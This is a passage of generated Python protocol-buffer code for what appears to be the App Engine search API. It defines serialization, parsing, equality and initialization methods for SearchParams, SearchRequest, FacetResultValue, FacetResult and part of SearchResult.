if (x.has_field_spec()): self.mutable_field_spec().MergeFrom(x.field_spec())
if (x.has_keys_only()): self.set_keys_only(x.keys_only())
if (x.has_parsing_mode()): self.set_parsing_mode(x.parsing_mode())
if (x.has_auto_discover_facet_count()): self.set_auto_discover_facet_count(x.auto_discover_facet_count())
for i in xrange(x.include_facet_size()): self.add_include_facet().CopyFrom(x.include_facet(i))
for i in xrange(x.facet_refinement_size()): self.add_facet_refinement().CopyFrom(x.facet_refinement(i))
if (x.has_facet_auto_detect_param()): self.mutable_facet_auto_detect_param().MergeFrom(x.facet_auto_detect_param())
if (x.has_facet_depth()): self.set_facet_depth(x.facet_depth())
def Equals(self, x):
if x is self: return 1
if self.has_index_spec_ != x.has_index_spec_: return 0
if self.has_index_spec_ and self.index_spec_ != x.index_spec_: return 0
if self.has_query_ != x.has_query_: return 0
if self.has_query_ and self.query_ != x.query_: return 0
if self.has_cursor_ != x.has_cursor_: return 0
if self.has_cursor_ and self.cursor_ != x.cursor_: return 0
if self.has_offset_ != x.has_offset_: return 0
if self.has_offset_ and self.offset_ != x.offset_: return 0
if self.has_cursor_type_ != x.has_cursor_type_: return 0
if self.has_cursor_type_ and self.cursor_type_ != x.cursor_type_: return 0
if self.has_limit_ != x.has_limit_: return 0
if self.has_limit_ and self.limit_ != x.limit_: return 0
if self.has_matched_count_accuracy_ != x.has_matched_count_accuracy_: return 0
if self.has_matched_count_accuracy_ and self.matched_count_accuracy_ != x.matched_count_accuracy_: return 0
if len(self.sort_spec_) != len(x.sort_spec_): return 0
for e1, e2 in zip(self.sort_spec_, x.sort_spec_):
if e1 != e2: return 0
if self.has_scorer_spec_ != x.has_scorer_spec_: return 0
if self.has_scorer_spec_ and self.scorer_spec_ != x.scorer_spec_: return 0
if self.has_field_spec_ != x.has_field_spec_: return 0
if self.has_field_spec_ and self.field_spec_ != x.field_spec_: return 0
if self.has_keys_only_ != x.has_keys_only_: return 0
if self.has_keys_only_ and self.keys_only_ != x.keys_only_: return 0
if self.has_parsing_mode_ != x.has_parsing_mode_: return 0
if self.has_parsing_mode_ and self.parsing_mode_ != x.parsing_mode_: return 0
if self.has_auto_discover_facet_count_ != x.has_auto_discover_facet_count_: return 0
if self.has_auto_discover_facet_count_ and self.auto_discover_facet_count_ != x.auto_discover_facet_count_: return 0
if len(self.include_facet_) != len(x.include_facet_): return 0
for e1, e2 in zip(self.include_facet_, x.include_facet_):
if e1 != e2: return 0
if len(self.facet_refinement_) != len(x.facet_refinement_): return 0
for e1, e2 in zip(self.facet_refinement_, x.facet_refinement_):
if e1 != e2: return 0
if self.has_facet_auto_detect_param_ != x.has_facet_auto_detect_param_: return 0
if self.has_facet_auto_detect_param_ and self.facet_auto_detect_param_ != x.facet_auto_detect_param_: return 0
if self.has_facet_depth_ != x.has_facet_depth_: return 0
if self.has_facet_depth_ and self.facet_depth_ != x.facet_depth_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_index_spec_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: index_spec not set.')
elif not self.index_spec_.IsInitialized(debug_strs): initialized = 0
if (not self.has_query_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: query not set.')
for p in self.sort_spec_:
if not p.IsInitialized(debug_strs): initialized=0
if (self.has_scorer_spec_ and not self.scorer_spec_.IsInitialized(debug_strs)): initialized = 0
if (self.has_field_spec_ and not self.field_spec_.IsInitialized(debug_strs)): initialized = 0
for p in self.include_facet_:
if not p.IsInitialized(debug_strs): initialized=0
for p in self.facet_refinement_:
if not p.IsInitialized(debug_strs): initialized=0
if (self.has_facet_auto_detect_param_ and not self.facet_auto_detect_param_.IsInitialized(debug_strs)): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.index_spec_.ByteSize())
n += self.lengthString(len(self.query_))
if (self.has_cursor_): n += 1 + self.lengthString(len(self.cursor_))
if (self.has_offset_): n += 1 + self.lengthVarInt64(self.offset_)
if (self.has_cursor_type_): n += 1 + self.lengthVarInt64(self.cursor_type_)
if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
if (self.has_matched_count_accuracy_): n += 1 + self.lengthVarInt64(self.matched_count_accuracy_)
n += 1 * len(self.sort_spec_)
for i in xrange(len(self.sort_spec_)): n += self.lengthString(self.sort_spec_[i].ByteSize())
if (self.has_scorer_spec_): n += 1 + self.lengthString(self.scorer_spec_.ByteSize())
if (self.has_field_spec_): n += 1 + self.lengthString(self.field_spec_.ByteSize())
if (self.has_keys_only_): n += 2
if (self.has_parsing_mode_): n += 1 + self.lengthVarInt64(self.parsing_mode_)
if (self.has_auto_discover_facet_count_): n += 1 + self.lengthVarInt64(self.auto_discover_facet_count_)
n += 2 * len(self.include_facet_)
for i in xrange(len(self.include_facet_)): n += self.lengthString(self.include_facet_[i].ByteSize())
n += 2 * len(self.facet_refinement_)
for i in xrange(len(self.facet_refinement_)): n += self.lengthString(self.facet_refinement_[i].ByteSize())
if (self.has_facet_auto_detect_param_): n += 2 + self.lengthString(self.facet_auto_detect_param_.ByteSize())
if (self.has_facet_depth_): n += 2 + self.lengthVarInt64(self.facet_depth_)
return n + 2
def ByteSizePartial(self):
n = 0
if (self.has_index_spec_):
n += 1
n += self.lengthString(self.index_spec_.ByteSizePartial())
if (self.has_query_):
n += 1
n += self.lengthString(len(self.query_))
if (self.has_cursor_): n += 1 + self.lengthString(len(self.cursor_))
if (self.has_offset_): n += 1 + self.lengthVarInt64(self.offset_)
if (self.has_cursor_type_): n += 1 + self.lengthVarInt64(self.cursor_type_)
if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
if (self.has_matched_count_accuracy_): n += 1 + self.lengthVarInt64(self.matched_count_accuracy_)
n += 1 * len(self.sort_spec_)
for i in xrange(len(self.sort_spec_)): n += self.lengthString(self.sort_spec_[i].ByteSizePartial())
if (self.has_scorer_spec_): n += 1 + self.lengthString(self.scorer_spec_.ByteSizePartial())
if (self.has_field_spec_): n += 1 + self.lengthString(self.field_spec_.ByteSizePartial())
if (self.has_keys_only_): n += 2
if (self.has_parsing_mode_): n += 1 + self.lengthVarInt64(self.parsing_mode_)
if (self.has_auto_discover_facet_count_): n += 1 + self.lengthVarInt64(self.auto_discover_facet_count_)
n += 2 * len(self.include_facet_)
for i in xrange(len(self.include_facet_)): n += self.lengthString(self.include_facet_[i].ByteSizePartial())
n += 2 * len(self.facet_refinement_)
for i in xrange(len(self.facet_refinement_)): n += self.lengthString(self.facet_refinement_[i].ByteSizePartial())
if (self.has_facet_auto_detect_param_): n += 2 + self.lengthString(self.facet_auto_detect_param_.ByteSizePartial())
if (self.has_facet_depth_): n += 2 + self.lengthVarInt64(self.facet_depth_)
return n
def Clear(self):
self.clear_index_spec()
self.clear_query()
self.clear_cursor()
self.clear_offset()
self.clear_cursor_type()
self.clear_limit()
self.clear_matched_count_accuracy()
self.clear_sort_spec()
self.clear_scorer_spec()
self.clear_field_spec()
self.clear_keys_only()
self.clear_parsing_mode()
self.clear_auto_discover_facet_count()
self.clear_include_facet()
self.clear_facet_refinement()
self.clear_facet_auto_detect_param()
self.clear_facet_depth()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.index_spec_.ByteSize())
self.index_spec_.OutputUnchecked(out)
out.putVarInt32(18)
out.putPrefixedString(self.query_)
if (self.has_cursor_):
out.putVarInt32(34)
out.putPrefixedString(self.cursor_)
if (self.has_cursor_type_):
out.putVarInt32(40)
out.putVarInt32(self.cursor_type_)
if (self.has_limit_):
out.putVarInt32(48)
out.putVarInt32(self.limit_)
if (self.has_matched_count_accuracy_):
out.putVarInt32(56)
out.putVarInt32(self.matched_count_accuracy_)
for i in xrange(len(self.sort_spec_)):
out.putVarInt32(66)
out.putVarInt32(self.sort_spec_[i].ByteSize())
self.sort_spec_[i].OutputUnchecked(out)
if (self.has_scorer_spec_):
out.putVarInt32(74)
out.putVarInt32(self.scorer_spec_.ByteSize())
self.scorer_spec_.OutputUnchecked(out)
if (self.has_field_spec_):
out.putVarInt32(82)
out.putVarInt32(self.field_spec_.ByteSize())
self.field_spec_.OutputUnchecked(out)
if (self.has_offset_):
out.putVarInt32(88)
out.putVarInt32(self.offset_)
if (self.has_keys_only_):
out.putVarInt32(96)
out.putBoolean(self.keys_only_)
if (self.has_parsing_mode_):
out.putVarInt32(104)
out.putVarInt32(self.parsing_mode_)
if (self.has_auto_discover_facet_count_):
out.putVarInt32(120)
out.putVarInt32(self.auto_discover_facet_count_)
for i in xrange(len(self.include_facet_)):
out.putVarInt32(130)
out.putVarInt32(self.include_facet_[i].ByteSize())
self.include_facet_[i].OutputUnchecked(out)
for i in xrange(len(self.facet_refinement_)):
out.putVarInt32(138)
out.putVarInt32(self.facet_refinement_[i].ByteSize())
self.facet_refinement_[i].OutputUnchecked(out)
if (self.has_facet_auto_detect_param_):
out.putVarInt32(146)
out.putVarInt32(self.facet_auto_detect_param_.ByteSize())
self.facet_auto_detect_param_.OutputUnchecked(out)
if (self.has_facet_depth_):
out.putVarInt32(152)
out.putVarInt32(self.facet_depth_)
def OutputPartial(self, out):
if (self.has_index_spec_):
out.putVarInt32(10)
out.putVarInt32(self.index_spec_.ByteSizePartial())
self.index_spec_.OutputPartial(out)
if (self.has_query_):
out.putVarInt32(18)
out.putPrefixedString(self.query_)
if (self.has_cursor_):
out.putVarInt32(34)
out.putPrefixedString(self.cursor_)
if (self.has_cursor_type_):
out.putVarInt32(40)
out.putVarInt32(self.cursor_type_)
if (self.has_limit_):
out.putVarInt32(48)
out.putVarInt32(self.limit_)
if (self.has_matched_count_accuracy_):
out.putVarInt32(56)
out.putVarInt32(self.matched_count_accuracy_)
for i in xrange(len(self.sort_spec_)):
out.putVarInt32(66)
out.putVarInt32(self.sort_spec_[i].ByteSizePartial())
self.sort_spec_[i].OutputPartial(out)
if (self.has_scorer_spec_):
out.putVarInt32(74)
out.putVarInt32(self.scorer_spec_.ByteSizePartial())
self.scorer_spec_.OutputPartial(out)
if (self.has_field_spec_):
out.putVarInt32(82)
out.putVarInt32(self.field_spec_.ByteSizePartial())
self.field_spec_.OutputPartial(out)
if (self.has_offset_):
out.putVarInt32(88)
out.putVarInt32(self.offset_)
if (self.has_keys_only_):
out.putVarInt32(96)
out.putBoolean(self.keys_only_)
if (self.has_parsing_mode_):
out.putVarInt32(104)
out.putVarInt32(self.parsing_mode_)
if (self.has_auto_discover_facet_count_):
out.putVarInt32(120)
out.putVarInt32(self.auto_discover_facet_count_)
for i in xrange(len(self.include_facet_)):
out.putVarInt32(130)
out.putVarInt32(self.include_facet_[i].ByteSizePartial())
self.include_facet_[i].OutputPartial(out)
for i in xrange(len(self.facet_refinement_)):
out.putVarInt32(138)
out.putVarInt32(self.facet_refinement_[i].ByteSizePartial())
self.facet_refinement_[i].OutputPartial(out)
if (self.has_facet_auto_detect_param_):
out.putVarInt32(146)
out.putVarInt32(self.facet_auto_detect_param_.ByteSizePartial())
self.facet_auto_detect_param_.OutputPartial(out)
if (self.has_facet_depth_):
out.putVarInt32(152)
out.putVarInt32(self.facet_depth_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_index_spec().TryMerge(tmp)
continue
if tt == 18:
self.set_query(d.getPrefixedString())
continue
if tt == 34:
self.set_cursor(d.getPrefixedString())
continue
if tt == 40:
self.set_cursor_type(d.getVarInt32())
continue
if tt == 48:
self.set_limit(d.getVarInt32())
continue
if tt == 56:
self.set_matched_count_accuracy(d.getVarInt32())
continue
if tt == 66:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_sort_spec().TryMerge(tmp)
continue
if tt == 74:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_scorer_spec().TryMerge(tmp)
continue
if tt == 82:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_field_spec().TryMerge(tmp)
continue
if tt == 88:
self.set_offset(d.getVarInt32())
continue
if tt == 96:
self.set_keys_only(d.getBoolean())
continue
if tt == 104:
self.set_parsing_mode(d.getVarInt32())
continue
if tt == 120:
self.set_auto_discover_facet_count(d.getVarInt32())
continue
if tt == 130:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_include_facet().TryMerge(tmp)
continue
if tt == 138:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_facet_refinement().TryMerge(tmp)
continue
if tt == 146:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_facet_auto_detect_param().TryMerge(tmp)
continue
if tt == 152:
self.set_facet_depth(d.getVarInt32())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_index_spec_:
res+=prefix+"index_spec <\n"
res+=self.index_spec_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_query_: res+=prefix+("query: %s\n" % self.DebugFormatString(self.query_))
if self.has_cursor_: res+=prefix+("cursor: %s\n" % self.DebugFormatString(self.cursor_))
if self.has_offset_: res+=prefix+("offset: %s\n" % self.DebugFormatInt32(self.offset_))
if self.has_cursor_type_: res+=prefix+("cursor_type: %s\n" % self.DebugFormatInt32(self.cursor_type_))
if self.has_limit_: res+=prefix+("limit: %s\n" % self.DebugFormatInt32(self.limit_))
if self.has_matched_count_accuracy_: res+=prefix+("matched_count_accuracy: %s\n" % self.DebugFormatInt32(self.matched_count_accuracy_))
cnt=0
for e in self.sort_spec_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("sort_spec%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
if self.has_scorer_spec_:
res+=prefix+"scorer_spec <\n"
res+=self.scorer_spec_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_field_spec_:
res+=prefix+"field_spec <\n"
res+=self.field_spec_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_keys_only_: res+=prefix+("keys_only: %s\n" % self.DebugFormatBool(self.keys_only_))
if self.has_parsing_mode_: res+=prefix+("parsing_mode: %s\n" % self.DebugFormatInt32(self.parsing_mode_))
if self.has_auto_discover_facet_count_: res+=prefix+("auto_discover_facet_count: %s\n" % self.DebugFormatInt32(self.auto_discover_facet_count_))
cnt=0
for e in self.include_facet_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("include_facet%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
cnt=0
for e in self.facet_refinement_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("facet_refinement%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
if self.has_facet_auto_detect_param_:
res+=prefix+"facet_auto_detect_param <\n"
res+=self.facet_auto_detect_param_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_facet_depth_: res+=prefix+("facet_depth: %s\n" % self.DebugFormatInt32(self.facet_depth_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kindex_spec = 1
kquery = 2
kcursor = 4
koffset = 11
kcursor_type = 5
klimit = 6
kmatched_count_accuracy = 7
ksort_spec = 8
kscorer_spec = 9
kfield_spec = 10
kkeys_only = 12
kparsing_mode = 13
kauto_discover_facet_count = 15
kinclude_facet = 16
kfacet_refinement = 17
kfacet_auto_detect_param = 18
kfacet_depth = 19
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "index_spec",
2: "query",
4: "cursor",
5: "cursor_type",
6: "limit",
7: "matched_count_accuracy",
8: "sort_spec",
9: "scorer_spec",
10: "field_spec",
11: "offset",
12: "keys_only",
13: "parsing_mode",
15: "auto_discover_facet_count",
16: "include_facet",
17: "facet_refinement",
18: "facet_auto_detect_param",
19: "facet_depth",
}, 19)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
4: ProtocolBuffer.Encoder.STRING,
5: ProtocolBuffer.Encoder.NUMERIC,
6: ProtocolBuffer.Encoder.NUMERIC,
7: ProtocolBuffer.Encoder.NUMERIC,
8: ProtocolBuffer.Encoder.STRING,
9: ProtocolBuffer.Encoder.STRING,
10: ProtocolBuffer.Encoder.STRING,
11: ProtocolBuffer.Encoder.NUMERIC,
12: ProtocolBuffer.Encoder.NUMERIC,
13: ProtocolBuffer.Encoder.NUMERIC,
15: ProtocolBuffer.Encoder.NUMERIC,
16: ProtocolBuffer.Encoder.STRING,
17: ProtocolBuffer.Encoder.STRING,
18: ProtocolBuffer.Encoder.STRING,
19: ProtocolBuffer.Encoder.NUMERIC,
}, 19, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.SearchParams'
class SearchRequest(ProtocolBuffer.ProtocolMessage):
has_params_ = 0
has_app_id_ = 0
app_id_ = ""
def __init__(self, contents=None):
self.params_ = SearchParams()
if contents is not None: self.MergeFromString(contents)
def params(self): return self.params_
def mutable_params(self): self.has_params_ = 1; return self.params_
def clear_params(self):self.has_params_ = 0; self.params_.Clear()
def has_params(self): return self.has_params_
def app_id(self): return self.app_id_
def set_app_id(self, x):
self.has_app_id_ = 1
self.app_id_ = x
def clear_app_id(self):
if self.has_app_id_:
self.has_app_id_ = 0
self.app_id_ = ""
def has_app_id(self): return self.has_app_id_
def MergeFrom(self, x):
assert x is not self
if (x.has_params()): self.mutable_params().MergeFrom(x.params())
if (x.has_app_id()): self.set_app_id(x.app_id())
def Equals(self, x):
if x is self: return 1
if self.has_params_ != x.has_params_: return 0
if self.has_params_ and self.params_ != x.params_: return 0
if self.has_app_id_ != x.has_app_id_: return 0
if self.has_app_id_ and self.app_id_ != x.app_id_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_params_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: params not set.')
elif not self.params_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.params_.ByteSize())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_params_):
n += 1
n += self.lengthString(self.params_.ByteSizePartial())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n
def Clear(self):
self.clear_params()
self.clear_app_id()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSize())
self.params_.OutputUnchecked(out)
if (self.has_app_id_):
out.putVarInt32(26)
out.putPrefixedString(self.app_id_)
def OutputPartial(self, out):
if (self.has_params_):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSizePartial())
self.params_.OutputPartial(out)
if (self.has_app_id_):
out.putVarInt32(26)
out.putPrefixedString(self.app_id_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_params().TryMerge(tmp)
continue
if tt == 26:
self.set_app_id(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_params_:
res+=prefix+"params <\n"
res+=self.params_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_app_id_: res+=prefix+("app_id: %s\n" % self.DebugFormatString(self.app_id_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kparams = 1
kapp_id = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "params",
3: "app_id",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.SearchRequest'
class FacetResultValue(ProtocolBuffer.ProtocolMessage):
has_name_ = 0
name_ = ""
has_count_ = 0
count_ = 0
has_refinement_ = 0
def __init__(self, contents=None):
self.refinement_ = FacetRefinement()
if contents is not None: self.MergeFromString(contents)
def name(self): return self.name_
def set_name(self, x):
self.has_name_ = 1
self.name_ = x
def clear_name(self):
if self.has_name_:
self.has_name_ = 0
self.name_ = ""
def has_name(self): return self.has_name_
def count(self): return self.count_
def set_count(self, x):
self.has_count_ = 1
self.count_ = x
def clear_count(self):
if self.has_count_:
self.has_count_ = 0
self.count_ = 0
def has_count(self): return self.has_count_
def refinement(self): return self.refinement_
def mutable_refinement(self): self.has_refinement_ = 1; return self.refinement_
def clear_refinement(self):self.has_refinement_ = 0; self.refinement_.Clear()
def has_refinement(self): return self.has_refinement_
def MergeFrom(self, x):
assert x is not self
if (x.has_name()): self.set_name(x.name())
if (x.has_count()): self.set_count(x.count())
if (x.has_refinement()): self.mutable_refinement().MergeFrom(x.refinement())
def Equals(self, x):
if x is self: return 1
if self.has_name_ != x.has_name_: return 0
if self.has_name_ and self.name_ != x.name_: return 0
if self.has_count_ != x.has_count_: return 0
if self.has_count_ and self.count_ != x.count_: return 0
if self.has_refinement_ != x.has_refinement_: return 0
if self.has_refinement_ and self.refinement_ != x.refinement_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_name_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: name not set.')
if (not self.has_count_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: count not set.')
if (not self.has_refinement_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: refinement not set.')
elif not self.refinement_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.name_))
n += self.lengthVarInt64(self.count_)
n += self.lengthString(self.refinement_.ByteSize())
return n + 3
def ByteSizePartial(self):
n = 0
if (self.has_name_):
n += 1
n += self.lengthString(len(self.name_))
if (self.has_count_):
n += 1
n += self.lengthVarInt64(self.count_)
if (self.has_refinement_):
n += 1
n += self.lengthString(self.refinement_.ByteSizePartial())
return n
def Clear(self):
self.clear_name()
self.clear_count()
self.clear_refinement()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
out.putVarInt32(16)
out.putVarInt32(self.count_)
out.putVarInt32(26)
out.putVarInt32(self.refinement_.ByteSize())
self.refinement_.OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_name_):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
if (self.has_count_):
out.putVarInt32(16)
out.putVarInt32(self.count_)
if (self.has_refinement_):
out.putVarInt32(26)
out.putVarInt32(self.refinement_.ByteSizePartial())
self.refinement_.OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_name(d.getPrefixedString())
continue
if tt == 16:
self.set_count(d.getVarInt32())
continue
if tt == 26:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_refinement().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_name_: res+=prefix+("name: %s\n" % self.DebugFormatString(self.name_))
if self.has_count_: res+=prefix+("count: %s\n" % self.DebugFormatInt32(self.count_))
if self.has_refinement_:
res+=prefix+"refinement <\n"
res+=self.refinement_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kname = 1
kcount = 2
krefinement = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "name",
2: "count",
3: "refinement",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.FacetResultValue'
class FacetResult(ProtocolBuffer.ProtocolMessage):
has_name_ = 0
name_ = ""
def __init__(self, contents=None):
self.value_ = []
if contents is not None: self.MergeFromString(contents)
def name(self): return self.name_
def set_name(self, x):
self.has_name_ = 1
self.name_ = x
def clear_name(self):
if self.has_name_:
self.has_name_ = 0
self.name_ = ""
def has_name(self): return self.has_name_
def value_size(self): return len(self.value_)
def value_list(self): return self.value_
def value(self, i):
return self.value_[i]
def mutable_value(self, i):
return self.value_[i]
def add_value(self):
x = FacetResultValue()
self.value_.append(x)
return x
def clear_value(self):
self.value_ = []
def MergeFrom(self, x):
assert x is not self
if (x.has_name()): self.set_name(x.name())
for i in xrange(x.value_size()): self.add_value().CopyFrom(x.value(i))
def Equals(self, x):
if x is self: return 1
if self.has_name_ != x.has_name_: return 0
if self.has_name_ and self.name_ != x.name_: return 0
if len(self.value_) != len(x.value_): return 0
for e1, e2 in zip(self.value_, x.value_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_name_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: name not set.')
for p in self.value_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.name_))
n += 1 * len(self.value_)
for i in xrange(len(self.value_)): n += self.lengthString(self.value_[i].ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_name_):
n += 1
n += self.lengthString(len(self.name_))
n += 1 * len(self.value_)
for i in xrange(len(self.value_)): n += self.lengthString(self.value_[i].ByteSizePartial())
return n
def Clear(self):
self.clear_name()
self.clear_value()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
for i in xrange(len(self.value_)):
out.putVarInt32(18)
out.putVarInt32(self.value_[i].ByteSize())
self.value_[i].OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_name_):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
for i in xrange(len(self.value_)):
out.putVarInt32(18)
out.putVarInt32(self.value_[i].ByteSizePartial())
self.value_[i].OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_name(d.getPrefixedString())
continue
if tt == 18:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_value().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_name_: res+=prefix+("name: %s\n" % self.DebugFormatString(self.name_))
cnt=0
for e in self.value_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("value%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kname = 1
kvalue = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "name",
2: "value",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.FacetResult'
class SearchResult(ProtocolBuffer.ProtocolMessage):
has_document_ = 0
has_cursor_ = 0
cursor_ = ""
def __init__(self, contents=None):
self.document_ = Document()
self.expression_ = []
self.score_ = []
if contents is not None: self.MergeFromString(contents)
def document(self): return self.document_
def mutable_document(self): self.has_document_ = 1; return self.document_
def clear_document(self):self.has_document_ = 0; self.document_.Clear()
def has_document(self): return self.has_document_
def expression_size(self): return len(self.expression_)
def expression_list(self): return self.expression_
def expression(self, i):
return self.expression_[i]
def mutable_expression(self, i):
return self.expression_[i]
def add_expression(self):
x = Field()
self.expression_.append(x)
return x
def clear_expression(self):
self.expression_ = []
def score_size(self): return len(self.score_)
def score_list(self): return self.score_
def score(self, i):
return self.score_[i]
def set_score(self, i, x):
self.score_[i] = x
def add_score(self, x):
self.score_.append(x)
def clear_score(self):
self.score_ = []
def cursor(self): return self.cursor_
def set_cursor(self, x):
self.has_cursor_ = 1
self.cursor_ = x
def clear_cursor(self):
if self.has_cursor_:
self.has_cursor_ = 0
self.cursor_ = ""
def has_cursor(self): return self.has_cursor_
def MergeFrom(self, x):
assert x is not self
if (x.has_document()): self.mutable_document().MergeFrom(x.document())
